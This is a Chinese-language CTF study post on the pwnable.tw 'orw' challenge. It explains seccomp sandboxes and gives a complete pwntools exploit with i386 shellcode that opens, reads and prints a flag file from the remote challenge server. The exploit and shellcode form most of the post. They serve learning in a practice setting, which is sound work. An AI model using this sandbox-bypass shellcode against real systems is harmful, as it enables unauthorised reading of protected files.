PWN

PWN study 0x04|pwnable.tw 上的 orw

Posted by Elli0t on 2020-05-06
  • seccomp sandbox

    • 通过 seccomp 加入沙箱,禁用/允许一些系统调用
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      void load_seccomp(){
      scmp_filter_ctx ctx;
      ctx = seccomp_init(SCMP_ACT_KILL);
      //seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
      sccomp_load(ctx);
      }

      printf("Your Shellcode >>");
      read(0, buffer, 0x10);
      function shellcode = (function)buffer;
      load_seccomp();
      shellcode();
    • 通过 seccomp-tools 来查看沙箱的信息
      seccomp
  • orw 是 open、read、write 的简写

    • 有时候 binary 会通过 prctl、seccomp 进行沙箱保护,并不能 getshell。只能通过 orw 的方式拿到 flag
    • fd = open(‘./flag’); # 打开 flag 文件,得到 fd
    • read(fd,buf,0x30); # 通过 fd 将 flag 的内容读到内存中
    • write(1,buf,0x30); # 将内存中的 flag 内容输出到屏幕🖥

demo

题目:https://pwnable.tw/challenge/#2

demo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
╭─root@97b3a7509c5a /pwn/freebuf/orw
╰─# python
Python 2.7.12 (default, Apr 15 2020, 17:07:12)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> map(hex,unpack_many("/home/orw/flag "))
['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']
>>>'6d6f682f'.decode('hex')
'moh/'
>>> '726f2f65'.decode('hex')
'ro/e'
>>> '6c662f77'.decode('hex')
'lf/w'
>>> '20206761'.decode('hex')
' ga'
>>>

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *
import time

context.terminal=["tmux","sp","-h"]
context.log_level='debug'
context.arch='i386' # Don't forget !!!

DEBUG = 0
LOCAL = True
BIN = './orw'
HOST = 'chall.pwnable.tw'
PORT = 10001

# shallcode = ''

# fd = open('./flag')
# read(fd,esp,0x30)
# write(1,esp,0x30)
#
# >>> map(hex,unpack_many("/home/orw/flag "))
# ['0x6d6f682f', '0x726f2f65', '0x6c662f77', '0x20206761']

shellcode = '''
xor eax, eax;
xor ebx, ebx;
xor ecx, ecx;
xor edx, edx;

push 0x00006761;
push 0x6c662f77;
push 0x726f2f65;
push 0x6d6f682f;

mov eax, 5; # open syscall number
mov ebx, esp; # filename
int 0x80; # eax = fd

mov ebx, eax; # fd = flag
mov ecx, esp; # buff = esp
mov edx, 0x30; # size = 0x30
mov eax, 3; # read syscall number
int 0x80;

mov ebx, 1; # fd = stdout
mov ecx, esp; # buff = esp
mov edx, 0x30; # size = 0x30
mov eax, 4; # write syscall number
int 0x80;

'''

def exploit(sh):
sh.recvuntil('Give my your shellcode:')
sh.sendline(asm(shellcode))
sh.interactive()
return

if __name__ == '__main__':
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
sh = remote(HOST,PORT)
exploit(sh)
else:
LOCAL = True
sh = process(BIN)
log.info('PID: ' + str(proc.pidof(sh)[0]))
# pause
if DEBUG:
gdb.attach(sh)
exploit(sh)
参考链接

https://github.com/david942j/seccomp-tools
seccomp工具
https://pwntools-docs-zh.readthedocs.io/zh_CN/latest/util/packing.html